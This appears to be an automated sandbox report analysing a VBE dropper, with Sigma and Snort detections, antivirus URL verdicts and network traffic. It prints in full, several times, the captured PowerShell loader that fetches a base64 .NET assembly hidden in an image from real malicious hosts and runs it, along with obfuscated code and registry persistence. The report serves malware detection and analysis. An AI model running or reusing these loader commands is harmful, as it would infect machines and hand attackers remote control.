$startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalF

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5612, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49699

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe", ProcessId: 5612, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTre

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Name.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3564, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6392, TargetFilename: C:\ProgramData\Name.vbs

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5612, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49699

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3564, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs, ProcessId: 6392, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalF

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalF

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe", ProcessId: 5612, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTre

Data Obfuscation

Sigma detected: Powershell download and load assembly

Source: Process started

Snort Signatures

ET TROJAN Windows executable base64 encoded - Source IP: 172.67.215.45 - Destination IP: 192.168.2.6

Timestamp:	172.67.215.45192.168.2.6443497012018856 02/13/24-21:13:54.637091
SID:	2018856
Source Port:	443
Destination Port:	49701
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Malicious Base64 Encoded Payload In Image - Source IP: 172.67.215.45 - Destination IP: 192.168.2.6

Timestamp:	172.67.215.45192.168.2.6443497012049038 02/13/24-21:13:55.113335
SID:	2049038
Source Port:	443
Destination Port:	49701
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Base64 Encoded MZ In Image - Source IP: 172.67.215.45 - Destination IP: 192.168.2.6

Timestamp:	172.67.215.45192.168.2.6443497012047750 02/13/24-21:13:54.637091
SID:	2047750
Source Port:	443
Destination Port:	49701
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: https://winderswonders.com/JK/hvnc.txt	Avira URL Cloud: Label: malware
Source: https://winderswonders.com	Avira URL Cloud: Label: malware
Source: https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673	Avira URL Cloud: Label: malware
Source: http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg	Avira URL Cloud: Label: malware

Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.6:49701 version: TLS 1.2

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 172.67.215.45:443 -> 192.168.2.6:49701
Source: Traffic	Snort IDS: 2018856 ET TROJAN Windows executable base64 encoded 172.67.215.45:443 -> 192.168.2.6:49701
Source: Traffic	Snort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 172.67.215.45:443 -> 192.168.2.6:49701

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Source: Name.vbs.5.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: Name.vbs.5.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4

Source: global traffic

HTTP traffic detected: GET /images/004/731/958/original/new_image.jpg?1707143673 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View	IP Address: 172.67.215.45 172.67.215.45

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /d/JZHbW HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: global traffic	HTTP traffic detected: GET /d/JZHbW HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /d/JZHbW HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: global traffic	HTTP traffic detected: GET /images/004/731/958/original/new_image.jpg?1707143673 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/JZHbW HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee

Source: unknown

DNS traffic detected: queries for: paste.ee

Source: powershell.exe, 00000004.00000002.2320092493.000001EA52349000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg
Source: powershell.exe, 00000005.00000002.2180217020.000002064B21C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063CB4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 00000000.00000002.2080144251.000001680CC2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079537922.000001680CC6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080190126.000001680CC6F000.00000004.00000020.00020000.00000000.sdmp, dereac.vbe	String found in binary or memory: http://paste.ee/d/JZHbW
Source: powershell.exe, 00000005.00000002.2166220762.000002063B3CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wscript.exe, 00000008.00000003.2287778815.000001D622B2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: powershell.exe, 00000002.00000002.2672856306.000002B34B5EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2325661291.000001EA54291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063B1A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
